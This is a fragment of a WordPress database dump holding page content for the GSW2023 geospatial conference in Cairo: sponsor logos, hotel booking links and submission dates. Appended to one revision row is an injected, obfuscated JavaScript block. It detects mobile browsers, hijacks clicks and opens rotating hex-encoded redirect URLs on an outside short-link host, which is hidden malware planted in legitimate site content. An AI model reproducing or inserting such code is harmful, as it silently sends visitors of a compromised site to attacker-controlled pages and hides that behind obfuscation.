main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 22:09:46','2023-06-09 22:09:46','',3066,'https://gsw2023.com/?p=4672',0,'revision','',0),
(4673,1,'2023-06-09 22:13:43','2023-06-09 22:13:43','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a></p>\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#ad78e2\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686348764407{margin-top: 160px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" 